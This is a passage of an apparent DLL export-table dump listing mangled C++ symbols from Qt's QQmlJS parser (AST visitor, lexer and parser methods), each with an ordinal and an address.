                                                                                                          ?endVisit@Visitor@AST@QQmlJS@@UAEXPAVFunctionDeclaration@23@@Z4980x7b1f70
                                                                                                          ?endVisit@Visitor@AST@QQmlJS@@UAEXPAVFunctionExpression@23@@Z4990x7b1f70
                                                                                                          ?endVisit@Visitor@AST@QQmlJS@@UAEXPAVFunctionSourceElement@23@@Z5000x7b1f70
                                                                                                          ?endVisit@Visitor@AST@QQmlJS@@UAEXPAVIdentifierExpression@23@@Z5010x7b1f70
                                                                                                          ?endVisit@Visitor@AST@QQmlJS@@UAEXPAVIdentifierPropertyName@23@@Z5020x7b1f70
                                                                                                          ?endVisit@Visitor@AST@QQmlJS@@UAEXPAVIfStatement@23@@Z5030x7b1f70
                                                                                                          ?endVisit@Visitor@AST@QQmlJS@@UAEXPAVLabelledStatement@23@@Z5040x7b1f70
                                                                                                          ?endVisit@Visitor@AST@QQmlJS@@UAEXPAVLocalForEachStatement@23@@Z5050x7b1f70
                                                                                                          ?endVisit@Visitor@AST@QQmlJS@@UAEXPAVLocalForStatement@23@@Z5060x7b1f70
                                                                                                          ?endVisit@Visitor@AST@QQmlJS@@UAEXPAVNestedExpression@23@@Z5070x7b1f70
                                                                                                          ?endVisit@Visitor@AST@QQmlJS@@UAEXPAVNewExpression@23@@Z5080x7b1f70
                                                                                                          ?endVisit@Visitor@AST@QQmlJS@@UAEXPAVNewMemberExpression@23@@Z5090x7b1f70
                                                                                                          ?endVisit@Visitor@AST@QQmlJS@@UAEXPAVNotExpression@23@@Z5100x7b1f70
                                                                                                          ?endVisit@Visitor@AST@QQmlJS@@UAEXPAVNullExpression@23@@Z5110x7b1f70
                                                                                                          ?endVisit@Visitor@AST@QQmlJS@@UAEXPAVNumericLiteral@23@@Z5120x7b1f70
                                                                                                          ?endVisit@Visitor@AST@QQmlJS@@UAEXPAVNumericLiteralPropertyName@23@@Z5130x7b1f70
                                                                                                          ?endVisit@Visitor@AST@QQmlJS@@UAEXPAVObjectLiteral@23@@Z5140x7b1f70
                                                                                                          ?endVisit@Visitor@AST@QQmlJS@@UAEXPAVPostDecrementExpression@23@@Z5150x7b1f70
                                                                                                          ?endVisit@Visitor@AST@QQmlJS@@UAEXPAVPostIncrementExpression@23@@Z5160x7b1f70
                                                                                                          ?endVisit@Visitor@AST@QQmlJS@@UAEXPAVPreDecrementExpression@23@@Z5170x7b1f70
                                                                                                          ?endVisit@Visitor@AST@QQmlJS@@UAEXPAVPreIncrementExpression@23@@Z5180x7b1f70
                                                                                                          ?endVisit@Visitor@AST@QQmlJS@@UAEXPAVProgram@23@@Z5190x7b1f70
                                                                                                          ?endVisit@Visitor@AST@QQmlJS@@UAEXPAVPropertyAssignmentList@23@@Z5200x7b1f70
                                                                                                          ?endVisit@Visitor@AST@QQmlJS@@UAEXPAVPropertyGetterSetter@23@@Z5210x7b1f70
                                                                                                          ?endVisit@Visitor@AST@QQmlJS@@UAEXPAVPropertyNameAndValue@23@@Z5220x7b1f70
                                                                                                          ?endVisit@Visitor@AST@QQmlJS@@UAEXPAVRegExpLiteral@23@@Z5230x7b1f70
                                                                                                          ?endVisit@Visitor@AST@QQmlJS@@UAEXPAVReturnStatement@23@@Z5240x7b1f70
                                                                                                          ?endVisit@Visitor@AST@QQmlJS@@UAEXPAVSourceElements@23@@Z5250x7b1f70
                                                                                                          ?endVisit@Visitor@AST@QQmlJS@@UAEXPAVStatementList@23@@Z5260x7b1f70
                                                                                                          ?endVisit@Visitor@AST@QQmlJS@@UAEXPAVStatementSourceElement@23@@Z5270x7b1f70
                                                                                                          ?endVisit@Visitor@AST@QQmlJS@@UAEXPAVStringLiteral@23@@Z5280x7b1f70
                                                                                                          ?endVisit@Visitor@AST@QQmlJS@@UAEXPAVStringLiteralPropertyName@23@@Z5290x7b1f70
                                                                                                          ?endVisit@Visitor@AST@QQmlJS@@UAEXPAVSwitchStatement@23@@Z5300x7b1f70
                                                                                                          ?endVisit@Visitor@AST@QQmlJS@@UAEXPAVThisExpression@23@@Z5310x7b1f70
                                                                                                          ?endVisit@Visitor@AST@QQmlJS@@UAEXPAVThrowStatement@23@@Z5320x7b1f70
                                                                                                          ?endVisit@Visitor@AST@QQmlJS@@UAEXPAVTildeExpression@23@@Z5330x7b1f70
                                                                                                          ?endVisit@Visitor@AST@QQmlJS@@UAEXPAVTrueLiteral@23@@Z5340x7b1f70
                                                                                                          ?endVisit@Visitor@AST@QQmlJS@@UAEXPAVTryStatement@23@@Z5350x7b1f70
                                                                                                          ?endVisit@Visitor@AST@QQmlJS@@UAEXPAVTypeOfExpression@23@@Z5360x7b1f70
                                                                                                          ?endVisit@Visitor@AST@QQmlJS@@UAEXPAVUiArrayBinding@23@@Z5370x7b1f70
                                                                                                          ?endVisit@Visitor@AST@QQmlJS@@UAEXPAVUiArrayMemberList@23@@Z5380x7b1f70
                                                                                                          ?endVisit@Visitor@AST@QQmlJS@@UAEXPAVUiHeaderItemList@23@@Z5390x7b1f70
                                                                                                          ?endVisit@Visitor@AST@QQmlJS@@UAEXPAVUiImport@23@@Z5400x7b1f70
                                                                                                          ?endVisit@Visitor@AST@QQmlJS@@UAEXPAVUiObjectBinding@23@@Z5410x7b1f70
                                                                                                          ?endVisit@Visitor@AST@QQmlJS@@UAEXPAVUiObjectDefinition@23@@Z5420x7b1f70
                                                                                                          ?endVisit@Visitor@AST@QQmlJS@@UAEXPAVUiObjectInitializer@23@@Z5430x7b1f70
                                                                                                          ?endVisit@Visitor@AST@QQmlJS@@UAEXPAVUiObjectMemberList@23@@Z5440x7b1f70
                                                                                                          ?endVisit@Visitor@AST@QQmlJS@@UAEXPAVUiParameterList@23@@Z5450x7b1f70
                                                                                                          ?endVisit@Visitor@AST@QQmlJS@@UAEXPAVUiPragma@23@@Z5460x7b1f70
                                                                                                          ?endVisit@Visitor@AST@QQmlJS@@UAEXPAVUiProgram@23@@Z5470x7b1f70
                                                                                                          ?endVisit@Visitor@AST@QQmlJS@@UAEXPAVUiPublicMember@23@@Z5480x7b1f70
                                                                                                          ?endVisit@Visitor@AST@QQmlJS@@UAEXPAVUiQualifiedId@23@@Z5490x7b1f70
                                                                                                          ?endVisit@Visitor@AST@QQmlJS@@UAEXPAVUiQualifiedPragmaId@23@@Z5500x7b1f70
                                                                                                          ?endVisit@Visitor@AST@QQmlJS@@UAEXPAVUiScriptBinding@23@@Z5510x7b1f70
                                                                                                          ?endVisit@Visitor@AST@QQmlJS@@UAEXPAVUiSourceElement@23@@Z5520x7b1f70
                                                                                                          ?endVisit@Visitor@AST@QQmlJS@@UAEXPAVUnaryMinusExpression@23@@Z5530x7b1f70
                                                                                                          ?endVisit@Visitor@AST@QQmlJS@@UAEXPAVUnaryPlusExpression@23@@Z5540x7b1f70
                                                                                                          ?endVisit@Visitor@AST@QQmlJS@@UAEXPAVVariableDeclaration@23@@Z5550x7b1f70
                                                                                                          ?endVisit@Visitor@AST@QQmlJS@@UAEXPAVVariableDeclarationList@23@@Z5560x7b1f70
                                                                                                          ?endVisit@Visitor@AST@QQmlJS@@UAEXPAVVariableStatement@23@@Z5570x7b1f70
                                                                                                          ?endVisit@Visitor@AST@QQmlJS@@UAEXPAVVoidExpression@23@@Z5580x7b1f70
                                                                                                          ?endVisit@Visitor@AST@QQmlJS@@UAEXPAVWhileStatement@23@@Z5590x7b1f70
                                                                                                          ?endVisit@Visitor@AST@QQmlJS@@UAEXPAVWithStatement@23@@Z5600x7b1f70
                                                                                                          ?errorCode@Lexer@QQmlJS@@QBE?AW4Error@12@XZ5610x8b2180
                                                                                                          ?errorColumnNumber@Parser@QQmlJS@@QBEHXZ5620x7c86c0
                                                                                                          ?errorLineNumber@Parser@QQmlJS@@QBEHXZ5630x7c8710
                                                                                                          ?errorMessage@Lexer@QQmlJS@@QBE?AVQString@@XZ5640x634180
                                                                                                          ?errorMessage@Parser@QQmlJS@@QBE?AVQString@@XZ5650x7c8760
                                                                                                          ?expression@Parser@QQmlJS@@QBEPAVExpressionNode@AST@2@XZ5660x7c87c0
                                                                                                          ?expressionCast@ExpressionNode@AST@QQmlJS@@UAEPAV123@XZ5670x8ac730
                                                                                                          ?expressionCast@Node@AST@QQmlJS@@UAEPAVExpressionNode@23@XZ5680x881d50
                                                                                                          ?finish@ArgumentList@AST@QQmlJS@@QAEPAV123@XZ5690x7b1fb0
                                                                                                          ?finish@CaseClauses@AST@QQmlJS@@QAEPAV123@XZ5700x7b1fb0
                                                                                                          ?finish@ElementList@AST@QQmlJS@@QAEPAV123@XZ5710x7b1f80
                                                                                                          ?finish@Elision@AST@QQmlJS@@QAEPAV123@XZ5720x7b1fa0
                                                                                                          ?finish@FormalParameterList@AST@QQmlJS@@QAEPAV123@XZ5730x7b1f90
                                                                                                          ?finish@PropertyAssignmentList@AST@QQmlJS@@QAEPAV123@XZ5740x7b1fb0
                                                                                                          ?finish@SourceElements@AST@QQmlJS@@QAEPAV123@XZ5750x7b1fb0
                                                                                                          ?finish@StatementList@AST@QQmlJS@@QAEPAV123@XZ5760x7b1fb0
                                                                                                          ?finish@UiArrayMemberList@AST@QQmlJS@@QAEPAV123@XZ5770x7b1fa0
                                                                                                          ?finish@UiHeaderItemList@AST@QQmlJS@@QAEPAV123@XZ5780x7b1fb0
                                                                                                          ?finish@UiObjectMemberList@AST@QQmlJS@@QAEPAV123@XZ5790x7b1fa0
                                                                                                          ?finish@UiParameterList@AST@QQmlJS@@QAEPAV123@XZ5800x7b1fc0
                                                                                                          ?finish@UiQualifiedId@AST@QQmlJS@@QAEPAV123@XZ5810x7b1fa0
                                                                                                          ?finish@UiQualifiedPragmaId@AST@QQmlJS@@QAEPAV123@XZ5820x7b1fa0
                                                                                                          ?finish@VariableDeclarationList@AST@QQmlJS@@QAEPAV123@_N@Z5830x7b1fd0
                                                                                                          ?firstSourceLocation@ArgumentList@AST@QQmlJS@@UBE?AVSourceLocation@23@XZ5840x7b2050
                                                                                                          ?firstSourceLocation@ArrayLiteral@AST@QQmlJS@@UBE?AVSourceLocation@23@XZ5850x7b2040
                                                                                                          ?firstSourceLocation@ArrayMemberExpression@AST@QQmlJS@@UBE?AVSourceLocation@23@XZ5860x7b2050
                                                                                                          ?firstSourceLocation@BinaryExpression@AST@QQmlJS@@UBE?AVSourceLocation@23@XZ5870x7b2050
                                                                                                          ?firstSourceLocation@Block@AST@QQmlJS@@UBE?AVSourceLocation@23@XZ5880x7b2070
                                                                                                          ?firstSourceLocation@BreakStatement@AST@QQmlJS@@UBE?AVSourceLocation@23@XZ5890x7b2010
                                                                                                          ?firstSourceLocation@CallExpression@AST@QQmlJS@@UBE?AVSourceLocation@23@XZ5900x7b2050
                                                                                                          ?firstSourceLocation@CaseBlock@AST@QQmlJS@@UBE?AVSourceLocation@23@XZ5910x7b2010
                                                                                                          ?firstSourceLocation@CaseClause@AST@QQmlJS@@UBE?AVSourceLocation@23@XZ5920x7b2040
                                                                                                          ?firstSourceLocation@CaseClauses@AST@QQmlJS@@UBE?AVSourceLocation@23@XZ5930x7b2050
                                                                                                          ?firstSourceLocation@Catch@AST@QQmlJS@@UBE?AVSourceLocation@23@XZ5940x7b2200
                                                                                                          ?firstSourceLocation@ConditionalExpression@AST@QQmlJS@@UBE?AVSourceLocation@23@XZ5950x7b2050
                                                                                                          ?firstSourceLocation@ContinueStatement@AST@QQmlJS@@UBE?AVSourceLocation@23@XZ5960x7b2010
                                                                                                          ?firstSourceLocation@DebuggerStatement@AST@QQmlJS@@UBE?AVSourceLocation@23@XZ5970x7b26b0
                                                                                                          ?firstSourceLocation@DefaultClause@AST@QQmlJS@@UBE?AVSourceLocation@23@XZ5980x7b2070
                                                                                                          ?firstSourceLocation@DeleteExpression@AST@QQmlJS@@UBE?AVSourceLocation@23@XZ5990x7b2070
                                                                                                          ?firstSourceLocation@DoWhileStatement@AST@QQmlJS@@UBE?AVSourceLocation@23@XZ6000x7b2040
                                                                                                          ?firstSourceLocation@ElementList@AST@QQmlJS@@UBE?AVSourceLocation@23@XZ6010x7b2020
                                                                                                          ?firstSourceLocation@Elision@AST@QQmlJS@@UBE?AVSourceLocation@23@XZ6020x7b2070
                                                                                                          ?firstSourceLocation@EmptyStatement@AST@QQmlJS@@UBE?AVSourceLocation@23@XZ6030x7b26b0
                                                                                                          ?firstSourceLocation@Expression@AST@QQmlJS@@UBE?AVSourceLocation@23@XZ6040x7b2050
                                                                                                          ?firstSourceLocation@ExpressionStatement@AST@QQmlJS@@UBE?AVSourceLocation@23@XZ6050x7b2050
                                                                                                          ?firstSourceLocation@FalseLiteral@AST@QQmlJS@@UBE?AVSourceLocation@23@XZ6060x7b26b0
                                                                                                          ?firstSourceLocation@FieldMemberExpression@AST@QQmlJS@@UBE?AVSourceLocation@23@XZ6070x7b2050
                                                                                                          ?firstSourceLocation@Finally@AST@QQmlJS@@UBE?AVSourceLocation@23@XZ6080x7b2070
                                                                                                          ?firstSourceLocation@ForEachStatement@AST@QQmlJS@@UBE?AVSourceLocation@23@XZ6090x7b2010
                                                                                                          ?firstSourceLocation@ForStatement@AST@QQmlJS@@UBE?AVSourceLocation@23@XZ6100x7b2200
                                                                                                          ?firstSourceLocation@FormalParameterList@AST@QQmlJS@@UBE?AVSourceLocation@23@XZ6110x7b2570
                                                                                                          ?firstSourceLocation@FunctionBody@AST@QQmlJS@@UBE?AVSourceLocation@23@XZ6120x7b2080
                                                                                                          ?firstSourceLocation@FunctionExpression@AST@QQmlJS@@UBE?AVSourceLocation@23@XZ6130x7b2690
                                                                                                          ?firstSourceLocation@FunctionSourceElement@AST@QQmlJS@@UBE?AVSourceLocation@23@XZ6140x7b2050
                                                                                                          ?firstSourceLocation@IdentifierExpression@AST@QQmlJS@@UBE?AVSourceLocation@23@XZ6150x7b2010
                                                                                                          ?firstSourceLocation@IfStatement@AST@QQmlJS@@UBE?AVSourceLocation@23@XZ6160x7b2010
                                                                                                          ?firstSourceLocation@LabelledStatement@AST@QQmlJS@@UBE?AVSourceLocation@23@XZ6170x7b2200
                                                                                                          ?firstSourceLocation@LocalForEachStatement@AST@QQmlJS@@UBE?AVSourceLocation@23@XZ6180x7b2010
                                                                                                          ?firstSourceLocation@LocalForStatement@AST@QQmlJS@@UBE?AVSourceLocation@23@XZ6190x7b2200
                                                                                                          ?firstSourceLocation@NestedExpression@AST@QQmlJS@@UBE?AVSourceLocation@23@XZ6200x7b2070
                                                                                                          ?firstSourceLocation@NewExpression@AST@QQmlJS@@UBE?AVSourceLocation@23@XZ6210x7b2070
                                                                                                          ?firstSourceLocation@NewMemberExpression@AST@QQmlJS@@UBE?AVSourceLocation@23@XZ6220x7b2040
                                                                                                          ?firstSourceLocation@NotExpression@AST@QQmlJS@@UBE?AVSourceLocation@23@XZ6230x7b2070
                                                                                                          ?firstSourceLocation@NullExpression@AST@QQmlJS@@UBE?AVSourceLocation@23@XZ6240x7b26b0
                                                                                                          ?firstSourceLocation@NumericLiteral@AST@QQmlJS@@UBE?AVSourceLocation@23@XZ6250x7b2040
                                                                                                          ?firstSourceLocation@ObjectLiteral@AST@QQmlJS@@UBE?AVSourceLocation@23@XZ6260x7b2070
                                                                                                          ?firstSourceLocation@PostDecrementExpression@AST@QQmlJS@@UBE?AVSourceLocation@23@XZ6270x7b2050
                                                                                                          ?firstSourceLocation@PostIncrementExpression@AST@QQmlJS@@UBE?AVSourceLocation@23@XZ6280x7b2050
                                                                                                          ?firstSourceLocation@PreDecrementExpression@AST@QQmlJS@@UBE?AVSourceLocation@23@XZ6290x7b2070
                                                                                                          ?firstSourceLocation@PreIncrementExpression@AST@QQmlJS@@UBE?AVSourceLocation@23@XZ6300x7b2070
                                                                                                          ?firstSourceLocation@Program@AST@QQmlJS@@UBE?AVSourceLocation@23@XZ6310x7b2080
                                                                                                          ?firstSourceLocation@PropertyAssignmentList@AST@QQmlJS@@UBE?AVSourceLocation@23@XZ6320x7b2050
                                                                                                          ?firstSourceLocation@PropertyGetterSetter@AST@QQmlJS@@UBE?AVSourceLocation@23@XZ6330x7b2040
                                                                                                          ?firstSourceLocation@PropertyName@AST@QQmlJS@@UBE?AVSourceLocation@23@XZ6340x7b26b0
                                                                                                          ?firstSourceLocation@PropertyNameAndValue@AST@QQmlJS@@UBE?AVSourceLocation@23@XZ6350x7b2050
                                                                                                          ?firstSourceLocation@RegExpLiteral@AST@QQmlJS@@UBE?AVSourceLocation@23@XZ6360x7b2200
                                                                                                          ?firstSourceLocation@ReturnStatement@AST@QQmlJS@@UBE?AVSourceLocation@23@XZ6370x7b2070
                                                                                                          ?firstSourceLocation@SourceElements@AST@QQmlJS@@UBE?AVSourceLocation@23@XZ6380x7b2050
                                                                                                          ?firstSourceLocation@StatementList@AST@QQmlJS@@UBE?AVSourceLocation@23@XZ6390x7b2050
                                                                                                          ?firstSourceLocation@StatementSourceElement@AST@QQmlJS@@UBE?AVSourceLocation@23@XZ6400x7b2050
                                                                                                          ?firstSourceLocation@StringLiteral@AST@QQmlJS@@UBE?AVSourceLocation@23@XZ6410x7b2010
                                                                                                          ?firstSourceLocation@SwitchStatement@AST@QQmlJS@@UBE?AVSourceLocation@23@XZ6420x7b2040
                                                                                                          ?firstSourceLocation@ThisExpression@AST@QQmlJS@@UBE?AVSourceLocation@23@XZ6430x7b26b0
                                                                                                          ?firstSourceLocation@ThrowStatement@AST@QQmlJS@@UBE?AVSourceLocation@23@XZ6440x7b2070
                                                                                                          ?firstSourceLocation@TildeExpression@AST@QQmlJS@@UBE?AVSourceLocation@23@XZ6450x7b2070
                                                                                                          ?firstSourceLocation@TrueLiteral@AST@QQmlJS@@UBE?AVSourceLocation@23@XZ6460x7b26b0
                                                                                                          ?firstSourceLocation@TryStatement@AST@QQmlJS@@UBE?AVSourceLocation@23@XZ6470x7b2010
                                                                                                          ?firstSourceLocation@TypeOfExpression@AST@QQmlJS@@UBE?AVSourceLocation@23@XZ6480x7b2070
                                                                                                          ?firstSourceLocation@UiArrayBinding@AST@QQmlJS@@UBE?AVSourceLocation@23@XZ6490x7b2110
                                                                                                          ?firstSourceLocation@UiArrayMemberList@AST@QQmlJS@@UBE?AVSourceLocation@23@XZ6500x7b2130
                                                                                                          ?firstSourceLocation@UiHeaderItemList@AST@QQmlJS@@UBE?AVSourceLocation@23@XZ6510x7b2050
                                                                                                          ?firstSourceLocation@UiImport@AST@QQmlJS@@UBE?AVSourceLocation@23@XZ6520x7b20e0
                                                                                                          ?firstSourceLocation@UiObjectBinding@AST@QQmlJS@@UBE?AVSourceLocation@23@XZ6530x7b20f0
                                                                                                          ?firstSourceLocation@UiObjectDefinition@AST@QQmlJS@@UBE?AVSourceLocation@23@XZ6540x7b2110
                                                                                                          ?firstSourceLocation@UiObjectInitializer@AST@QQmlJS@@UBE?AVSourceLocation@23@XZ6550x7b26b0
                                                                                                          ?firstSourceLocation@UiObjectMemberList@AST@QQmlJS@@UBE?AVSourceLocation@23@XZ6560x7b2130
                                                                                                          ?firstSourceLocation@UiParameterList@AST@QQmlJS@@UBE?AVSourceLocation@23@XZ6570x7b2150
                                                                                                          ?firstSourceLocation@UiPragma@AST@QQmlJS@@UBE?AVSourceLocation@23@XZ6580x7b2070
                                                                                                          ?firstSourceLocation@UiProgram@AST@QQmlJS@@UBE?AVSourceLocation@23@XZ6590x7b2160
                                                                                                          ?firstSourceLocation@UiPublicMember@AST@QQmlJS@@UBE?AVSourceLocation@23@XZ6600x7b21c0
                                                                                                          ?firstSourceLocation@UiQualifiedId@AST@QQmlJS@@UBE?AVSourceLocation@23@XZ6610x7b2200
                                                                                                          ?firstSourceLocation@UiQualifiedPragmaId@AST@QQmlJS@@UBE?AVSourceLocation@23@XZ6620x7b2200
                                                                                                          ?firstSourceLocation@UiScriptBinding@AST@QQmlJS@@UBE?AVSourceLocation@23@XZ6630x7b2110
                                                                                                          ?firstSourceLocation@UiSourceElement@AST@QQmlJS@@UBE?AVSourceLocation@23@XZ6640x7b2210
                                                                                                          ?firstSourceLocation@UnaryMinusExpression@AST@QQmlJS@@UBE?AVSourceLocation@23@XZ6650x7b2070
                                                                                                          ?firstSourceLocation@UnaryPlusExpression@AST@QQmlJS@@UBE?AVSourceLocation@23@XZ6660x7b2070
                                                                                                          ?firstSourceLocation@VariableDeclaration@AST@QQmlJS@@UBE?AVSourceLocation@23@XZ6670x7b2690
                                                                                                          ?firstSourceLocation@VariableDeclarationList@AST@QQmlJS@@UBE?AVSourceLocation@23@XZ6680x7b2050
                                                                                                          ?firstSourceLocation@VariableStatement@AST@QQmlJS@@UBE?AVSourceLocation@23@XZ6690x7b2070
                                                                                                          ?firstSourceLocation@VoidExpression@AST@QQmlJS@@UBE?AVSourceLocation@23@XZ6700x7b2070
                                                                                                          ?firstSourceLocation@WhileStatement@AST@QQmlJS@@UBE?AVSourceLocation@23@XZ6710x7b2040
                                                                                                          ?firstSourceLocation@WithStatement@AST@QQmlJS@@UBE?AVSourceLocation@23@XZ6720x7b2040
                                                                                                          ?followsClosingBrace@Lexer@QQmlJS@@QBE_NXZ6730x8b2190
                                                                                                          ?importFile@Directives@QQmlJS@@UAEXABVQString@@0@Z6740x54baa0
                                                                                                          ?importModule@Directives@QQmlJS@@UAEXABVQString@@00@Z6750x5ac550
                                                                                                          ?isDecimalDigit@Lexer@QQmlJS@@CA_NG@Z6760x8b2220
                                                                                                          ?isError@DiagnosticMessage@QQmlJS@@QBE_NXZ6770x7b2350
                                                                                                          ?isHexDigit@Lexer@QQmlJS@@CA_NVQChar@@@Z6780x8b2240
                                                                                                          ?isIdentLetter@Lexer@QQmlJS@@CA_NVQChar@@@Z6790x8b2270
                                                                                                          ?isLineTerminator@Lexer@QQmlJS@@ABE_NXZ6800x8b23a0
                                                                                                          ?isLineTerminatorSequence@Lexer@QQmlJS@@ABEIXZ6810x8b23d0
                                                                                                          ?isOctalDigit@Lexer@QQmlJS@@CA_NG@Z6820x8b2410
                                                                                                          ?isUnicodeEscapeSequence@Lexer@QQmlJS@@CA_NPBVQChar@@@Z6830x8b2430
                                                                                                          ?isWarning@DiagnosticMessage@QQmlJS@@QBE_NXZ6840x99af30
                                                                                                          ?lastSourceLocation@ArgumentList@AST@QQmlJS@@UBE?AVSourceLocation@23@XZ6850x7b2a70
                                                                                                          ?lastSourceLocation@ArrayLiteral@AST@QQmlJS@@UBE?AVSourceLocation@23@XZ6860x7b26a0
                                                                                                          ?lastSourceLocation@ArrayMemberExpression@AST@QQmlJS@@UBE?AVSourceLocation@23@XZ6870xa6b2e0
                                                                                                          ?lastSourceLocation@BinaryExpression@AST@QQmlJS@@UBE?AVSourceLocation@23@XZ6880x7b2650
                                                                                                          ?lastSourceLocation@Block@AST@QQmlJS@@UBE?AVSourceLocation@23@XZ6890x7b2690
                                                                                                          ?lastSourceLocation@BreakStatement@AST@QQmlJS@@UBE?AVSourceLocation@23@XZ6900x7b2150
                                                                                                          ?lastSourceLocation@CallExpression@AST@QQmlJS@@UBE?AVSourceLocation@23@XZ6910xa6b2e0
                                                                                                          ?lastSourceLocation@CaseBlock@AST@QQmlJS@@UBE?AVSourceLocation@23@XZ6920x7b20e0
                                                                                                          ?lastSourceLocation@CaseClause@AST@QQmlJS@@UBE?AVSourceLocation@23@XZ6930x7b24b0
                                                                                                          ?lastSourceLocation@CaseClauses@AST@QQmlJS@@UBE?AVSourceLocation@23@XZ6940x7b2750
                                                                                                          ?lastSourceLocation@Catch@AST@QQmlJS@@UBE?AVSourceLocation@23@XZ6950x7b2670
                                                                                                          ?lastSourceLocation@ConditionalExpression@AST@QQmlJS@@UBE?AVSourceLocation@23@XZ6960x7b2650
                                                                                                          ?lastSourceLocation@ContinueStatement@AST@QQmlJS@@UBE?AVSourceLocation@23@XZ6970x7b2150
                                                                                                          ?lastSourceLocation@DebuggerStatement@AST@QQmlJS@@UBE?AVSourceLocation@23@XZ6980x7b2200
                                                                                                          ?lastSourceLocation@DefaultClause@AST@QQmlJS@@UBE?AVSourceLocation@23@XZ6990x7b2500
                                                                                                          ?lastSourceLocation@DeleteExpression@AST@QQmlJS@@UBE?AVSourceLocation@23@XZ7000x7b2a00
                                                                                                          ?lastSourceLocation@DoWhileStatement@AST@QQmlJS@@UBE?AVSourceLocation@23@XZ7010xa6a9f0
                                                                                                          ?lastSourceLocation@ElementList@AST@QQmlJS@@UBE?AVSourceLocation@23@XZ7020x7b2630
                                                                                                          ?lastSourceLocation@Elision@AST@QQmlJS@@UBE?AVSourceLocation@23@XZ7030x7b2580
                                                                                                          ?lastSourceLocation@EmptyStatement@AST@QQmlJS@@UBE?AVSourceLocation@23@XZ7040x7b26b0
                                                                                                          ?lastSourceLocation@Expression@AST@QQmlJS@@UBE?AVSourceLocation@23@XZ7050x7b2550
                                                                                                          ?lastSourceLocation@ExpressionStatement@AST@QQmlJS@@UBE?AVSourceLocation@23@XZ7060x7b2070
                                                                                                          ?lastSourceLocation@FalseLiteral@AST@QQmlJS@@UBE?AVSourceLocation@23@XZ7070x7b26b0
                                                                                                          ?lastSourceLocation@FieldMemberExpression@AST@QQmlJS@@UBE?AVSourceLocation@23@XZ7080x7b2570
                                                                                                          ?lastSourceLocation@Finally@AST@QQmlJS@@UBE?AVSourceLocation@23@XZ7090x7b2580
                                                                                                          ?lastSourceLocation@ForEachStatement@AST@QQmlJS@@UBE?AVSourceLocation@23@XZ7100x7b2650
                                                                                                          ?lastSourceLocation@ForStatement@AST@QQmlJS@@UBE?AVSourceLocation@23@XZ7110x7b2670
                                                                                                          ?lastSourceLocation@FormalParameterList@AST@QQmlJS@@UBE?AVSourceLocation@23@XZ7120x7b25d0
                                                                                                          ?lastSourceLocation@FunctionBody@AST@QQmlJS@@UBE?AVSourceLocation@23@XZ7130x7b26c0
                                                                                                          ?lastSourceLocation@FunctionExpression@AST@QQmlJS@@UBE?AVSourceLocation@23@XZ7140x7b2620
                                                                                                          ?lastSourceLocation@FunctionSourceElement@AST@QQmlJS@@UBE?AVSourceLocation@23@XZ7150x7b2a00
                                                                                                          ?lastSourceLocation@IdentifierExpression@AST@QQmlJS@@UBE?AVSourceLocation@23@XZ7160x7b2010
                                                                                                          ?lastSourceLocation@IfStatement@AST@QQmlJS@@UBE?AVSourceLocation@23@XZ7170x7b2630
                                                                                                          ?lastSourceLocation@LabelledStatement@AST@QQmlJS@@UBE?AVSourceLocation@23@XZ7180x7b2670
                                                                                                          ?lastSourceLocation@LocalForEachStatement@AST@QQmlJS@@UBE?AVSourceLocation@23@XZ7190x7b2650
                                                                                                          ?lastSourceLocation@LocalForStatement@AST@QQmlJS@@UBE?AVSourceLocation@23@XZ7200x7b2670
                                                                                                          ?lastSourceLocation@NestedExpression@AST@QQmlJS@@UBE?AVSourceLocation@23@XZ7210x7b2690
                                                                                                          ?lastSourceLocation@NewExpression@AST@QQmlJS@@UBE?AVSourceLocation@23@XZ7220x7b2a00
                                                                                                          ?lastSourceLocation@NewMemberExpression@AST@QQmlJS@@UBE?AVSourceLocation@23@XZ7230x7b26a0
                                                                                                          ?lastSourceLocation@NotExpression@AST@QQmlJS@@UBE?AVSourceLocation@23@XZ7240x7b2a00
                                                                                                          ?lastSourceLocation@NullExpression@AST@QQmlJS@@UBE?AVSourceLocation@23@XZ7250x7b26b0
                                                                                                          ?lastSourceLocation@NumericLiteral@AST@QQmlJS@@UBE?AVSourceLocation@23@XZ7260x7b2040
                                                                                                          ?lastSourceLocation@ObjectLiteral@AST@QQmlJS@@UBE?AVSourceLocation@23@XZ7270x7b2690
                                                                                                          ?lastSourceLocation@PostDecrementExpression@AST@QQmlJS@@UBE?AVSourceLocation@23@XZ7280x7b2070
                                                                                                          ?lastSourceLocation@PostIncrementExpression@AST@QQmlJS@@UBE?AVSourceLocation@23@XZ7290x7b2070
                                                                                                          ?lastSourceLocation@PreDecrementExpression@AST@QQmlJS@@UBE?AVSourceLocation@23@XZ7300x7b2a00
                                                                                                          ?lastSourceLocation@PreIncrementExpression@AST@QQmlJS@@UBE?AVSourceLocation@23@XZ7310x7b2a00
                                                                                                          ?lastSourceLocation@Program@AST@QQmlJS@@UBE?AVSourceLocation@23@XZ7320x7b26c0
                                                                                                          ?lastSourceLocation@PropertyAssignmentList@AST@QQmlJS@@UBE?AVSourceLocation@23@XZ7330x7b2750
                                                                                                          ?lastSourceLocation@PropertyGetterSetter@AST@QQmlJS@@UBE?AVSourceLocation@23@XZ7340x7b2720
                                                                                                          ?lastSourceLocation@PropertyName@AST@QQmlJS@@UBE?AVSourceLocation@23@XZ7350x7b26b0
                                                                                                          ?lastSourceLocation@PropertyNameAndValue@AST@QQmlJS@@UBE?AVSourceLocation@23@XZ7360x7b2730
                                                                                                          ?lastSourceLocation@RegExpLiteral@AST@QQmlJS@@UBE?AVSourceLocation@23@XZ7370x7b2200
                                                                                                          ?lastSourceLocation@ReturnStatement@AST@QQmlJS@@UBE?AVSourceLocation@23@XZ7380x7b2690
                                                                                                          ?lastSourceLocation@SourceElements@AST@QQmlJS@@UBE?AVSourceLocation@23@XZ7390x7b2750
                                                                                                          ?lastSourceLocation@StatementList@AST@QQmlJS@@UBE?AVSourceLocation@23@XZ7400x7b2750
                                                                                                          ?lastSourceLocation@StatementSourceElement@AST@QQmlJS@@UBE?AVSourceLocation@23@XZ7410x7b2a00
                                                                                                          ?lastSourceLocation@StringLiteral@AST@QQmlJS@@UBE?AVSourceLocation@23@XZ7420x7b2010
                                                                                                          ?lastSourceLocation@SwitchStatement@AST@QQmlJS@@UBE?AVSourceLocation@23@XZ7430x7b2780
                                                                                                          ?lastSourceLocation@ThisExpression@AST@QQmlJS@@UBE?AVSourceLocation@23@XZ7440x7b26b0
                                                                                                          ?lastSourceLocation@ThrowStatement@AST@QQmlJS@@UBE?AVSourceLocation@23@XZ7450x7b2690
